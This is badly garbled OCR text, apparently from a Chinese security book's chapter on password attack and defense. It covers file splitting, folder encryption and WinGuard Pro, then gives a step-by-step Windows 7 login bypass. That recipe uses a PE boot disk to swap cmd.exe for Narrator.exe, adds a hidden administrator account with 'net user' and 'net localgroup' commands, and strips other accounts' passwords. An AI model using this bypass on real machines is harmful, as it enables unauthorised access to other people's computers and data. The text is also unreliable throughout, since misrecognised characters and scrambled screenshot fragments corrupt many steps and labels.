名 的 文件 夹 " 单 。 文件 的 存储 位 置 。 
选 按 钮 。 
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FF 天 一 


EE 
取 
未 





售 人 他 他 


STEP09: 打开 “选项 ”对 话 框 


局 创建 BAT 廊 件 这 样 我 就 不 几 再 使 用 Chop 程 序 
使 用 CRC 
加 密 

加 密 字符 捉 . 切 妃 忘记 ! 


《< 上- 步 @)| 


国 选 中 “使 用 Chop” 单 选 ” 辆 单 击 “ 完 成 " 按钮 
按钮 ， 勾 选 “ 加 密 ” 复 选 框 ” 即 开始 进行 辟 分 文件 
并 输入 加 密 密 码 。 操作 。 


STEP11: 合并 臂 分 后 的 文件 


要 影 分 / 丛 并 的 文件 
未 选中 文件 
无 交 件 
描述 
使 用 
加 密 
加 密 


输出 格式 
电邮 数量 | 避 大 [oo 下 














单 击 “ 选 择 ” 按 钮 。 


STEP13: 返回 “Chop” 对 话 框 
Chop 1.51 

要 辟 分 /合并 的 交 件 

F: 资 料 花 模 \ 花 林 0001, 中 p 


花香 ,rar 38, 348, 556 字 节 








国 单 击 “选择 "按钮 ， 辆 单 击 “ 开 始 合 
ender 并 ”按钮 。 


位 置 。 
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> 
攻防 从 入 门 到 精通 








STEP10: 





尽 分 文件 完成 





单 击 “ 继 续 ” 按 钮 即 可 返回 主 界面 。 


STEP12: 选择 要 合并 的 文件 


号 | | ， 计算 机 本 地 磁盘 (F] 资料 ， 花 赤 








必须 选择 chp 类 


人 ”名称 





图 蕊 六 0oolchp 


2014/9/3 10:39 





图 花卉 0002.chp 
国 元 才 0003.chp 
图 花卉 0004.chp 
图 花 寺 0005.chp 
国 在 寺 0006.chp 
引 | 辆 在 卉 0007.chp 
轿 花 卉 0008.chp 
图 死 赤 0009.chp 
国 元 才 0010.chp 
图 ne chp 
[| 一 


2014/9/5 10:39 
2014/9/5 10:39 
2014/9/5 10:39 
2014/9/5 10:39 
2014/9/5 10:39 
2014/9/5 10:39 
2014/9/5 10:39 
2014/9/5 10:39 
2014/9/5 10:39 
2014/9/5 10:39 





WB 一 一 mm 





文件 名 (N): 花卉 0001.qhp 





选择 要 合并 的 文件 ， 这 


STEP14: 合并 完成 








单 击 “打开 " 
按钮 。 





单 击 “ 继 续 ” 按 钮 可 返回 主 窗口 。 
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密码 攻防 


8.3.2 ”对 文件 夹 进行 加 宅 


除了 给 计算 机 中 的 文件 进行 加 密 ， 还 需要 为 文件 夹 加 密 。 使 用 Windows 系统 中 自 带 的 
加 密 功 能 可 以 对 文件 夹 以 及 子 文件 进行 加 密 ， 还 可 以 使 用 专门 的 工具 对 文件 夹 进行 加 密 。 

1. 使 用 Windows 系统 自 带 的 加 密 功 能 

对 于 很 多 企业 都 存在 多 人 用 一 台 计 算 机 的 情况 。 如 果 用 户 不 希望 他 人 访问 自己 创建 的 文件 
的 内 容 ， 则 可 运用 Windows 自 带 的 加 密 文件 系统 对 创建 的 文件 夹 及 其 子 文件 进行 加 密 。 

具体 的 操作 步骤 如 下 。 
STEP01: 双击 “计算 机 ”图 标 STEP02: 打开 “属性 ”对 话 框 
































还 原 以 前 的 版 本 (V) 


文件 (编辑 (E) ”查看 (V) 工具 (T) 帮助 国 用 Malwarebytes Anti-Malware 扫 扩 


常规 ”| 安全 ”| 以 前 的 版 本 
司 打开 ”包含 到 库 中 ”| 小 添加 到 压 综 文件 (A).… 


ns 新 建文 件 志 


大 








| 习 ” 压 绽 并 E-mail.. 
EE | 激 ” 压 痢 到 "新 建文 件 夫 ,rar" 并 E-mail 


. 辆 | 口 读 (个 应 用 于 文件 夹 中 的 文件 ) (R) 
发 送 到 (N) 
党 最 近 访 问 的 位 置 回 隐藏 0 
新 和 葛 切 (T) 
复制 (OQ) 





司库 
加 | PPTV 视 频 A | 创建 快捷 方式 (5) 


新 建文 件 夹 修改 日 期 : 2014/9/ 删除 (D) 
文件 去 重 命 名 [MI) 











右 击 要 加 密 的 文件 夹 ， 从 快捷 菜单 中 选择 “属性 ” ” 单 击 “高 级 ”按钮 。 


全 全 
Dx o 
STEP03: 打开 “ 融 级 属性 ”对 话 框 STEP04: 打开 “确认 属性 更 改 ” 对 话 框 


人 您 已 经 选择 对 属性 进行 以 下 和 更改 : 
= he 2 [1 1 EE 9 王 [11 ry 5 [1 四 EE Ts 于 5 
人 加 密 
是 否 要 将 此 更 改 避 应 用 于 此 文件 夹 ， 或 者 是 否 要 将 它 应 用 于 所 有 子 文 | 
压缩 或 加 密 属性 得 更 村 裤 拉 


站 压缩 内 容 以 便 节 省 磁盘 空间 丰 ) 名 如 将 更 改 应 用 于 此 文件 来 
加 密 内 容 以 便 保 护 数据 灾 ) 详细 信息 种 ) | 加 将 更 改 应 用 于 此 文件 来、 子 文 件 夹 和 文 








国 匀 选 “加 密 内 容 以 便 单 击 “ 确 定 ” 选择 将 更 改 仅 应 用 章 才 “确定 
保护 数据 ” 复 选 框 。 按钮 。 于 此 文件 夹 还 是 此 文件 接 钮 。 


夹 、 子 文件 夹 和 文件 。 


利用 Windows 系统 自 带 的 加 密 功 能 对 文件 夹 进行 加 密 ， 只 适合 NTFS 文件 
系统 ， 而 不 适合 FAT32 文件 系统 。 


提示 
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客 
会 全 对 性 


2. 文件 夹 加 密 超级 大 师 


沸 尖 [ 





攻防 从 入 门 到 精通 





“文件 夹 加 密 超 级 大 师 ” 是 一 球 强 大 的 文件 加 密 软 件 和 文件 夹 加 密 软 件 ， 具 有 


允 人 作 加 窜 文件 天 加 密 


备 等 功能 。 


使 用 “文件 来 加 密 超级 大 师 ” 软 件 进 行 加 密 的 上 其 体操 作 步 


STEP01: 打开 “文件 夹 加 密 超 级 大 师 ” 
主 窗 口 


二 立 件 炎 加 弯 起 级 大 师 K 未 往 册 版 


次 件 炎 加 密 女 件 加 密 次 忻 夹 伪装 | 磁盘 保护 | 数据 粉碎 | 
'S 闪电 加 密 文件 习 | ( 解密 或 解除 伪装 请 在 相应 记录 上 单 击 ， 单 击 右 键 


元 余天 过 茎 











厅 写 ” ”人 2 全 夹 避 








亡 忻 夹 加 窗 超 级 大 师 16,06 版 权 所 有 2005 - 2010 夏 冰 软件 ， 


入 入 注册 玛 _] 
单 击 “ 文 件 夹 加 密 ” 按 钮 。 


STEP03: 设置 加 密 密 码 


用 加 空 立 件 夹 D:\ 图 片 \picture 


加 要 容 码 ; 和 





骆 类 型 : 回 闪 上 电 ”加 隐 启 ”加 全 面 。 加 人 金 四 ”加 移动 





根据 提示 输入 设 单 击 “ 加 密 ” 
置 的 加 密 密 码 。 按钮 。 


加 密 后 的 文件 夹具 有 最 
开 功 能 (临时 解密 


提示 
STEP05: 输入 密码 


| 二 立 件 夹 加 密 超 级 大 师 一 请 输入 密 一 -| 




















打开 | ms | 取 | 


[铭文 件 来 打开 后 ， 趟 使 用 时 自动 关闭 。 





2 








输入 设置 的 密码 ， 可 临时 解密 并 打开 该 文件 来。 如 
果 单 击 “ 解 密 ” 按 钮 ， 则 可 进行 解密 操作 。 
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(5、 数 据 粉 碎 、 彻 确 隐 藏 便 盘 








高 的 加 密 强 度 ， 且 防 删 除 、 
， 计 每 次 使 用 加 密 文 件 夹 或 加 密 文件 后 不 用 重新 加 密 ). 


分 区 、 禁 止 或 只 该 使 用 USB 设 


骤 如 下 。 
STEP02: 选择 要 加 密 的 文件 夹 


中 十 婚礼 照 











国 选中 要 加 密 国 单 击 “确定 
的 文件 夹 。 按钮 。 
STEP04: 返回 “文件 天 加 窗 超 级 大 师 ” 主 窗口 








加 六 件 夹 加 衬 超 级 大 是 (未 广 册 版 * 》 





文件 夹 加 密 | 六 件 加 密 | 文件 夹 伪 装 | 磁盘 保护 数据 粉碎 | 高 级 设置 一 帮助 | 


当前 显示 | 闪电 加 密 文件 来 。” [ 《和解 客 或 解除 伪装 请 在 相应 记录 上 单 击 ， 单 击 右键 弹出 快捷 菜单 ) ”| 权限 ] 换 肤 ] | 




















在 列表 中 查看 加 密 的 文件 夹 并 双击 该 文件 夹 。 


防 复制 、 防 移动 ， 还 有 打 





STEP06: ”对 单个 文件 进行 加 密 








型 熏 保护 2 数据 糙 碎 。 】 高 级 设置 村 帮助 
起 限 L 执 肝 ] 














文件 严 加 密 超 级 犬 师 16.d6 版 权 所 有 2005 - 2010 夏 冰 软 件 ， [ 志 输入 注册 玛 _] | 现在 购买 | 退出 
单 击 “ 文 件 加 密 ” 按钮 。 





STEP07: 选择 要 加 密 的 文件 





日 讨 巴 加 


aaa [Bt 












文 f 名 四 : “| 帮 m 局 


meni hs 
回 以 只 读 方式 打开 凶 ) 











选中 要 加 密 的 文件 ， 这 里 国 单 击 “打开 ' 
选择 rmvb 类 型 的 文件 。 按钮 。 


STEP09: 正在 加 密 





[5 志 影 衣 店 Tmwb : ce 





| 二 文件 夹 加 密 超 级 大 师 - 加 密 立 件 : 


处 理 数据 : |D 电 让 \ 忘 店 ,/myb 
处 理 埋 度 ; 妆 一 是 一 一 和 一 和 一 和 一 和 一 和 一 和 一 各 一 各 一 和 一 和 一 各 一 和 


后 台 处 理 | | 终止 | 


查看 加 密 进 度 ， 单 击 “ 终 止 ”按钮 可 终止 加 密 。 





D'D'3 











STEP11: 输入 密码 





| 壤 语 丛 入 密码 * 和 解密 文件 D'\ 电 影 ' 夜 店 = 














在 “密码 " 文本 框 中 输入 正确 的 密码 , 单 击 “打开 
按钮 可 打开 该 文件 。 


STEP13: 选择 要 伪 攻 的 文件 夹 








[区 训 览 立 件 去 
请 选择 要 协 装 的 立 件 来 










| 日 全 图片 
; : 由 -| 器 picture 











选 定 要 伪装 的 贺 单 击 “ 确 定 ” 
文件 夹 。 按钮 。 
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密码 攻防 


STEP08: 设置 加 密 密 码 








F 加 雍 D* 电 影 ' 夜 店 .rmvb 











国 根据 提示 输入 加 密 窗 单 击 “加 密 ” 
码 并 选择 加 密 类 型 。 按钮 。 


STEP10: 加 窗 完 


















9 交 件 夹 加 空 超级 大 是 C 未 注册 版 * 》 





文件 到 加 密 | 文件 加 密 文件 来 伪装 “| ”而 盘 保护 数据 粉碎 高 级 设置 各 助 | 
当前 显示 ( 解 窜 或 解除 伪装 请 在 相应 记录 上 单 击 ， 单 击 右键 弹出 快捷 菜单 ) ”权限 | | 热 肢 ] 


度 写 强 过 件 咯 区 
I 夜店 .rrmwb D\ 电 影 \ 夜 店 .rmvb 






















文件 夹 加 密 超 级 大 师 16.06 版 权 所 有 2005 - 2010 夏 冰 对 件 ， 





在 主 窗口 的 文件 列表 中 看 到 成 功 加 密 的 文件 ， 双 击 
该 文件 。 


STEP12: 


将 文件 夹 伪 靖 成 特定 的 图 标 


篇 文件 夹 加 率 超 级 大 师 ( 未 广 册 版 ?了 eee 


_ 文 件 洋 加 窗 ] 文件 加 se ae 数据 粉碎 王 一 证 下 助 | 
当前 显示 ( 解密 或 逢 除 伪装 请 在 相应 记录 上 单 击 ， 单 击 右键 漳 出 快捷 菜单 》 | 权限 ] | 换 潜 | 






































文件 夹 加 密 超 级 大 师 16.06 版 权 所 有 2005 | 2010 夏 冰 软件 ， 输入 注册 码 _|」 现在 购买 | jiE 出 





在 主 窗口 中 单 击 “文件 来 伪装 ”按钮 。 





器 雏 存 文件 





站 回收 站 [ca6 交 件 
[| JWwebFolders |_|IE 国 预 订 交 件 夹 
一 秆 划 柱 党 一 撞 号 同 基 [四 html 文 件 
中 脱 机 净 件 夹 ”加 搜索 计算 机 加 搜索 结果 
确定 一 
勾 选 “htm 文 国 单 击 “ 确 定 ” 
件 ” 复 选 框 。 按钮 。 


201 





EE 
A Pe >  _ 
关 有 一 上 一 攻防 从 入 门 到 精通 


STEP15: 伪 装 成 功 STEP16: 打开 伪装 a 
加 文件 夹 加 实 超级 | ( CDGDGQ 

















文件 (日 ”编辑 (E) ”查看 (V) 工具 (T) ”帮助 (H) 
组 织 了 包 会 到 库 中 放映 幻灯 片 








、 主 )】 交 件 夹 化 装 成 功 ! 


人 | 症 





于 | 点 面 picture 图 _DSC3477f 
量 最 后 访问 的 位 轩 起 二 本 
司库 
3 部 ppTV 视 频 
单 击 “ 确 定 ” 按 钮 。 查看 指定 的 文件 夹 ， 可 以 看 到 该 文件 夹 已 伪装 为 html 
类 型 的 文件 。 











STEP17: 返回 主 窗 终 口 STEP18: 打开 J 对 话 框 


文件 夹 加 密 超 级 大 师 ( 未 注册 版 ? 7 


文件 夫 加 密 文人 加 密 文件 夫 六 里 | 出 委 保护 |。 光束 
当前 显示 | 困 电 加 密 文 件 来 。 [ ]】《 解密 或 解除 伪装 请 在 相应 记录 上 单 击 ， 单 击 右键 弹出 块 按 训 
诈 Ss57 放 天 有 余天 过 李 













四 使 用 本 软件 需 密码 设置 密码 
| 药 件 金 外 加密 成 功 后 删除 原 交 件 
国立 件 移动 加 密 成 功 后 删除 原 交 件 




















文件 夹 加 密 超级 大 师 1 和 06 版 权 所 有 2005 - 2010 夏 冰 软件 世 答 和 注册 码 [现在 购买 ji 回 文 件 来 移动 加 密 成 功 后 册 除 原文 件 来 
ee ， 固 交 件 夹 金 钻 加 密 成 功 后 删除 原 交 件 夹 
单 击 “ 高 级 设置 ”按钮 。 一 一 软件 隐藏 选 项 


| 本 在 系统 右键 菜单 添加 [加 密 ] 荣 单项 
L 轩 特殊 显示 加 密 交 件 夹 


es 
设置 密码 及 其 他 属 性 。 





8.3:3 ”WinGuard 加 密 应 用 程序 


WinGuard Pro 能 用 密码 保护 程序 、 窗 口 和 网 页 ， 加 密 私人 文件 和 文件 夹 。 它 为 计算 机 
提供 了 多 合 一 的 安全 解决 方案 ， 能 够 锁 住 加 面 、 局 动 键 、 任 务 键 ， 禁 止 软件 安装 和 Internet 
接 入 等 。 使 用 WinGuard 加 密 应 用 程序 的 具体 操作 步骤 如 下 。 

STEP01: 下 载 并 安 表 WinGuard Pro STEP02: 打开 “WinGuard Pro” 主 窗口 


TaskLock off. If you Updated WinGuard, it turns On when you Restart Turn On TaskLock Now 


区 Not Active Lock a Task... | 


Locked Desktop Programs & Apps on this PC: Options: 

回 Weather 

加 Calendar 站 Change Password 
回 Mail 而 Delete Task 

下 | People 

F| Windows Media Player 


No password found, the defualt 
Is: latmein 








Password: 














"| User Accounts 
"| Run 








@ Task Manager is Unlocked Fix This 


Version: 8.16 WinGuard Online 
| Check for Updates You have 1 Offer (click to view 


[= 


Help Manual 


——— -一 一 一 一 -一 一 一 - 





About WinGuard 





查看 WinGuard 的 各 项 功能 。 
双击 图 标 轿 ， 打开 在 “Password " 文本 


“WinGuard Configu-  ” 框 中 输入 默认 密码 并 单 击 
ration ”对话 框 。 “Enter 按钮 。 
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和 


STEP03: 切换 至 “Password” 选 项 卡 


Iurn Dn TaskLocK Now 


A WinGuard Pro 2014 


TaskLock Off. If you Updated WinGuard, it turns On when you Restart 


Password 





New Password: ee 


Confirm New Password: **f 











Help Manual 








根据 提示 在 文本 杠 
中 输入 要 设置 的 密码 。 


单 击 “Apply” 
按钮 。 


STEP05: 查看 已 加 密 的 文件 








文件 ( 
组 织 ~ 


编辑 (E) ” 音 看 (V) ”工具 (TD) 帮助 (H) 
包含 到 库 中 ”新 建文 件 去 





误 收藏 夫 
如 下 载 


图 | 诸 面 

各 | 最 后 访问 的 位 置 
局 库 

闻 PPTV 视 频 


De 


| 2 个 对 和 
加 密 后 的 文件 图 标 发 生变 化 。 双 击 该 文件 ， 可 对 文 
件 进行 解密 ,查看 加 密 后 的 文件 。 


STEP07: 打开 WinGuard 主 窗口 


Turn On TaskLock Now 


A WinGuard Pro 2014 - 


“3 
TaskLock Off. If you Updated WinGuard, it turns On when you Restart 





File Protection 





Enter the full path of the file or folder to encrypt or decrypt: 


F;\ 资 料 \ 花 覃 \ 花 析 .rar.wg8 Browse for Directory... 











(Encrypt (128bit AEB) | [Decrypt | 











EE | 


Help Manual 


单 击 “jorpt 
按钮 ， 即 可 对 文件 
进行 解密 。 


在 “File Protection” 
选项 卡 下 选中 要 解密 的 
文件 。 











密码 攻防 


STEP04: 切换 至 “File Protection” 选 项 卡 


A WinGuard Pro 2014 Cl 


TaskLock Off. If you Updated WinGuard, it turns On when you Restart Turn On TaskLock Now 


File Protection 





e full path of the file or folder to encrypt or decrypt 


Enter th = ile © D pt: 
Browse for Directory... 
FF: 资料 (六 章 咏 弄 .rar TY 


Encrypt (128bit AES) B 











单 击 “Encrypt…… . 
按钮 ， 即 可 对 文件 进行 
加 密 。 


单 击 “Browse for 
File” 按钮， 选择 要 加 


密 的 文件 。 
STEP06: 输入 窗 码 


WinGuard Configuration 





Enter your password to access 
WinGuard Configuration. 


Password: 





输入 设置 的 
加 密 密 码 。 


单 击 “Enter” 
按钮 。 


STEP08: 查看 已 解密 的 文件 


Ex 
GO+ 有 《<< 资料 花卉 ， = 他 || 苯 圭 访 疗 D 


文件 (F) ”编辑 (E) ”查看 (V) 工具 (T) ”帮助 (H) 
组 织 v 包含 到 库 中 v 新 建文 件 夫 


广 收藏 夫 


思 下 载 
性 | 讲 面 
通 最 后 方 问 的 位 置 


已 解密 的 文件 ， 文 件 恢复 成 原来 的 RAR 格 式 。 
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> 





攻防 从 入 门 到 精通 














8.41 ”利用 Wind0oWs 7 PFE 破解 系统 登录 密码 


Windows 7 PE 是 一 款 可 安装 在 便 盘 、U 盘 上 的 软件 ， 它 为 用 户 提 供 了 独立 于 本 地 操作 
系统 的 临时 Windows 7 we 含有 GHOST 、 人 硬盘 分 区 、 密 但 破解 以 及 数据 恢复 等 功能 ， 
Windows 7 PE 之 所 以 有 这 么 多 功能 ， 是 因为 它 运 行 在 内 存 中 。 下 面 曝 光 利 用 Windows 7 PE 
破解 系统 登录 密码 的 操作 方法 。 











STEP01: 选择 进入 BIOS STEP02: 选择 Advanced BIOS Features 


CHOS Setup Utility - Copyright (C) 1984-2889 fward Software 
Memory Freguency For DDRZ 888 (Dual Channel Mode} 一 一 一 一 一 - 


ATA Chanmel 1 
SATA Chanmel 3 b Standard CHOS Features Load Fail-Safe Defaults 
SATA Channmel z 
SATA Channcl 4 - » Advanced BIOS Features Load 0ptimized Defaults 
SATA Chanmel 5 
SATA Channel bb » Integrated Peripherals Set Superuisor Passuord 


b> PC Health 
Press Fi1 to continue, DEL to enter SETUF pm Status Exit Hithout Saving 


106-19-2007— 1XM38-W62Z?7DHG-—6A?79PA1BC-11 





重新 启动 计算 机 ， 当 显示 自 检 界面 时 , 按 《Del) 键 ， 打开 BIOS 界 面 ， 利 用 方向 键 选择 “Advanced BIOS 
选择 进入 BIOS。 Features”， 按 《Enter》 键 。 


进入 BIOS 的 其 他 万 法 


目前 市 场 上 常见 的 BIOS 并 非 只 有 一 种 ， 有 些 计算 机 在 开机 自 检 界面 中 会 
人 办 键 ， 而 有 些 则 不 显示 。 对 于 不 显示 和 进入 方法 的 计 
算 机 ， 可 在 主板 说 明 书 中 查看 进入 BIOS 的 方法 ， 进 入 BIOS 的 方法 都 是 通过 
按键 盘 上 的 某 一 个 功能 键 实现 的 ， 常 用 的 按键 主要 有 (〈(F2》、(Del》 和 (Escy》 
键 等 。 





STEP03: 选择 “Hard Disk Boot Priority” STEP04: 选择 USB-HDD 选项 


CMOS Setup Utility ~ Copuright (C) 1984-2889 CHOS Setup \ 


pyr1g ,1 小 
Advanced BIOS Features Hard Bisk Boot priority 





1. USB-HDDG : KingstonDataTraveler 2 


* Hard Disk Boot Priority [Press Enter] Mingstonyatalraveier 
2. Che H. : HDL HUJZUUHHYS-VUL/HY 





First Boot Jevice [Hard Disk] 

Te [USB-HDD] 3. Bootable Adi-in Cards 

Third Boot Device [CDROM] 
选择 “Hard Disk Boot Priority ”选项 ， 然 后 按 选择 “USB-HDD "选项 ， 然 后 按 (+》 键 ， 将 其 移 
(Enter) 键 。 至 最 顶端 。 
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STEP05: 设置 从 硬盘 启动 STEP06: 选择 PE 工具 箱 


GRUB4DOS 8.4.5b 2619-686-63, Mem: 638KR/509MABM, End: 34C7C7 


» Hard Disk Boot Priority [Press Enter] 
First Boot Device 
Password Lheck 
HID S$.M.A.R.T. Ca 
Linit CPUID Max. 


简洁 实用 的 绝对 PE 工具 箱 
现在 为 您 提供 进 六 杰 或 003 的 选择 项 ， 选 中 要 进 太 的 项 目 ， 扶 


81] 绝对 PE 工具 箱 
[92] MaxD0S Plus 工 且 和 攻 
[83] 从 硬盘 启动 计算 机 


[64] 重新 启动 计算 机 


No-Execute Memory|| Floppy 
LPU Enhanced Haltl LS1i28 
Hl 
CPU EIST Functionll CDROM 
Virtualization Tell ZIP 

Init Display Firs|! USB-FDD 





选择 “First Boot 选择 "Hard Disk” 保存 BIOS 设 置 后 重新 启动 计算 机 ,计算 机 自动 从 U 
Device "后 按 (Enter) 键 。 选项 后 按 (Enter) 键 。 盘 启 动 ， 在 界面 中 选择 绝对 “PE 工具 箱 ” 选 项 , 按 
《Enter)》 键 。 


保存 对 BIOS 设置 所 做 的 更 改 
个 当 在 BIOS 中 完成 从 U 盘 局 动 的 设置 后 ， 可 按 (F10》 键 ， 然 后 在 弹出 
oi 的 对 话 框 中 输入 “Y” 并 按 〈《Enter〉 键 ， 计 算 机 将 保存 对 BIOS 所 做 的 设置 
所 示 。 并 自动 重新 启动 . 





STEP07: 双击 “计算 机 ”图 标 STEP08: 更改 Narrator 文件 名 


ED OO- mn RC wo -sen | 


WDM 碟 拟 汪 驱 
组 织 打开 | 新 建文 件 来 


上 收 蕊 来 
久 | napipsec.dll 
遇 库 | 名 | NAPMONTR.DLL 


EN NAPSTAT,EXE 
j 台 计算 机 


9 Narrator,exe 


SP 芒 | NativeHooks,dll 
有 岳 有 枉 厅 和 目 动 U56 妆 于 [FRR 
弹出 不 持 "上田 1 十 算 机 | Pa Narratord.exe 


打开 Windows 7 PE 系统 桌面 , 双击 “计算 机 ”图 标 。 打开 “System 32” 将 文件 名 Narrator 
文件 夹 窗口 。 改 为 Narrator0。 





更 改 文 件 名 的 常用 方法 
© 更 改 文件 名 的 常用 方法 主要 有 两 种 : 第 一 种 是 石 击 待 更 改 的 文件 选项 ， 在 弹出 


的 快捷 菜单 中 单 击 “ 重 命名 ” 命 今后 输入 新 的 文件 名 ， 然 后 按 (Enter) 键 ; 第 二 种 
下 小 是 选 中 待 更 改 的 文件 选项 ， 按 《F2) 键 后 输入 新 的 文件 名 ， 然 后 按 (Enter) 键 . 


日 一 
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又 
新 信人 色色 志 


STEP09: 更 改 cmd 文件 名 


， 计算 机 ~ 系统 保留 {C:) ~ Windows ~ System32 ~ 


组 织 打开 新建 文件 来 


因 引 dip.exe 


使 用 相同 的 方法 将 cmd.exe 文 件 的 名 称 更 改 为 narra- 


toro 
STEP11: 


名 轰 松 访问 


使 计算 机 更 易于 使 用 
按 下 空格 键 选择 高 亮 是 示 的 选项 


团 朗读 屏幕 内 容 (讲述 人 ) 


选择 讲述 人 


放大 屏 划 上 的 项 目 (放大 镜 ) 











在 较 高 色彩 对 比 度 下 查看 (高 对 比 度 ) 











勾 选 “ 朗 读 屏 幕 内 容 单 击 “ 确 定 ” 
( 讲述 人 ) ” 复 选 框 。 按钮 。 
STEP13: 为 新 账户 赋予 管理 员 权限 
C:\Windows\System32\Narrator.exe 

邓 统 无 法 在 消息 交 忻 中 为 Rpplication 村 到 消息 号 为 6x2358 的 消 


hR 权 所 有 《cy》 2002 Microsoft Corporat ion. 保留 所 有 权利 。 
系统 无 法 在 消息 文件 中 为 System 找到 消息 号 为 Bx8 的 消息 文本 。 





CsWUindowsssystem32>net user kane 123 -add 


营 令 成 功 完 成 。 


C:\Windows\system32>net localgroup administrators kane /ad 
闻 仿 成 功 完 成 。 


C:\Windows\s ystem32> 


输入 “net localgroup administrators kane /add "后 
按 (Enter》 键 。 


> 
攻防 从 入 门 到 精通 














STEP10: 


单 击 “ 轻 松 访问 ”图 标 





拔 下 U 盘 后 重启 计算 机 ， 在 系统 登录 界面 中 单 击 左 
下 角 的 “轻松 访问 ”图 标 。 
STEP12: 利用 DOS 命令 添加 账户 





C\Windows\System32\Narrator.exe 
系统 无 法 在 消息 交 忻 中 为 pplication 找到 消息 号 为 Bx2 


ha 相 所 有 《c> 2999 Microsoft Corporation。 怀 留 所 有 权 
系 闹 无 法 在 请 息 交 人 忻 中 为 System 找到 消息 号 为 8x8 的 站 


C:\Windows \system32>net user kane i123 Aadd 


命令 成 功 完成 。 





输入 “net user kane 123 /add ”后 按 《Enter) 键 ， 添 
加 密码 为 123 的 账户 。 
STEP14: 选择 新 创建 的 账户 





再 次 重启 计算 机 ， 可 看 见 创建 的 kane 账 户 ， 单 击 该 
账户 。 


“net localgroup administratorskane /add” 的 含 


© 


提示 。 并 清除 其 他 账户 的 登录 密码 。 


Administrators 组 中 ， 
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“net localgroup administrators kane/add” 是 指 将 名 称 为 kane 的 账户 添加 到 
让 其 成 为 管理 员 账 户 ， 这 样 ， 就 可 以 直接 进入 操作 系统 ， 





STEP15: 


输入 登录 密码 


“全 并 用 户 Q 





输入 该 账户 的 登 
录 密 码 123。 


STEP17: 选择 用 户 账户 


按钮 。 








单 击 "登录 





加 Cs| 国 ， 拉 i ， 所 有 控制 面板 硕 ， 。 ， | 分 | | 雁 过 汉 夯 上 


查 雁 方式 ， 大 图 标 


辕 5 








调整 计算 机 的 设置 


磺 | 示 统 


村 性 能 信息 和 工具 


项 和 桌面 小 工具 


上 AN 
由 语音 识别 


若 要 清除 指定 账户 的 密码 ， 则 在 “控制 面板 ”窗口 
中 单 击 “ 用 户 账户 ”链接 。 


STEP19: 选择 要 清除 密码 的 账户 


”| 好 咱 鸭 甘 六 测 夯 匠 








GO BrP , Faw 


选择 希望 更 改 的 帐户 








kane 


密码 保护 


Guest 
来 室 帐 户 没 有 启用 


在 “选择 希望 更 改 的 账户 ”界面 中 选择 要 清除 密码 
的 账户 。 


8 


密码 攻防 


STEP16: 成 功 进 入 系统 





成 功 进 入 系统 桌面 ， 至 此 可 以 说 是 成 功 绕 过 登录 密 
码 进入 操作 系统 。 
STEP18: 管理 其 他 账户 

更 改 用 户 帐户 


更 改 放 码 一 
出 除 记 码 ly 鸯 | Kane 


管理 员 
更 改 图 片 密码 保护 
大 更 改 帐户 名 称 


在 “更 改 用 户 账户 ”界面 中 单 击 “ 管 理 其 他 账户 
链接 。 


STEP20: ”删除 登录 密码 


更 改 John 的 帐户 
更 改 帐 户 名 称 


设置 家 长 控制 
村 改 帐户 类 型 


删除 帐户 





管理 其 他 帐户 


单 击 “删除 密码 " 链接 即 可 删除 该 账户 的 登录 密码 。 


8. 和 42 利用 窗 码 重 置 盘 破 解 系统 登录 窗 码 
密码 重 置 盘 是 一 种 能 够 不 限 次 数 更 改 登录 密码 的 工具 ， 利 用 它 可 以 随意 更 改 指定 用 户 
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取 -一 一 > 
全- 攻防 从 入 门 到 精通 

全 人 人 他 

账户 的 登录 密码 。 对 于 黑客 和 用 户 自己 ， 密 码 重 置 盘 都 有 着 很 重要 的 作用 。 利 用 密码 重 四 

盘 破 解 系统 登录 密码 包括 创建 密码 重 置 盘 和 修改 密码 两 个 阶段 。 下 面 曝光 具体 操作 。 


STEP01: 选择 用 户 账户 STEP02: 选择 创建 密码 重 设 盘 























调整 计算 机 的 设置 


村 性 能 信息 和 工具 


| 喘 宕 难 解答 


链接 著 | ID 
管理 文件 加 密 证 书 
配置 高 级 用 户 配置 文件 尾 性 i 


向 ”语音 识别 于 


国 则 自动 播放 


国 更 改 帐户 名 称 


打开 “控制 面板 ”窗口 ， 在 “大 图 标 ” 查 看 方式 下 在 “用 户 账户 ”窗口 中 单 击 “创建 密码 重 设 盘 ” 
单 击 “ 用 户 账户 ”链接 。 链接 。 
STEP03: 单 击 “下 一 步 ”按钮 STEP04: 选择 创建 密 钥 盘 的 驱动 器 


忘记 客 码 向 导 


欢迎 使 用 扎 记 密码 向 导 句 导 将 把 此 用 户 帐户 的 密码 信息 保存 到 下 面 的 虑 动 器 中 的 磁盘 上 。 





我 想 在 下 面 的 驱动 器 中 创建 一 个 密码 密 钥 盘 内) : 


ene 可 移动 磁盘 多:) 


认 : 任何 大 都 可 以 用 此 盘 重 置 密码 ， 并 由 此 访问 此 


i 


单 击 “ 下 一 步 ”继续 。 








< 上 一 步 (6B) 





单 击 “ 下 一 步 ”按钮 。 选择 将 密 钥 盘 单 击 “ 下 一 步 " 
安装 在 U 盘 中 。 按钮 。 


STEP05: 输入 当前 用 户 账户 的 密码 


忘记 密码 向 导 


当前 用 户 帐 户 密码 
此 回 导 需要 知道 用 户 帐 户 的 当前 密码 。 





钨 业 碟 间作 从 硅 交 各 过 史 二 然后 输入 当前 用 户 帐 广 密码 。 如果 此 帐户 


当前 用 户 帐户 密码 C): 
99999 输入 当前 账户 的 登录 密码 。 








EN 单 击 “下 一 步 ”按钮 。 


密码 理 曾 盘 适 用 于 所 有 用 户 账 户 


© 在 Windows 7 系统 中 创建 密码 重 置 盘 后 ， 该 工具 适用 于 当前 系统 中 的 所 有 
提示 。 管理 员 账 户 和 标准 账户 。 
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8 章 
密码 攻防 





STEP06: 正在 创建 密码 重 置 盘 STEP07: 完成 创建 


正在 创建 密码 重 置 磁盘 


一 起 人 
请 稍 候 ; 向 导 正 在 创建 说 盘 。 正在 完成 忘记 密码 向 导 





人 


进度 : 100% 已 完成 撞 此 盘 标 记 为 “密码 重 置 ”， 并 且 将 它 保存 在 安全 的 


若 要 关闭 此 向 导 ， 请 单 击 “ 完 成 ”。 





当 进度 为 100% 时 , 单 击 “下 一 步 ”按钮 。 
单 击 “ 完 成 ”按钮 ， 完 成 密码 重 置 盘 的 创建 。 


STEP08: 选择 要 重 置 密码 的 账户 STEP09: 提示 用 户 名 或 密码 错误 


©.9 :rl 


[RE 





重新 启动 计算 机 ， 在 系统 登录 界面 选择 要 重 置 密码 “如果 输入 错误 的 密码 ， 则 会 提示 用 户 名 或 密码 不 正 


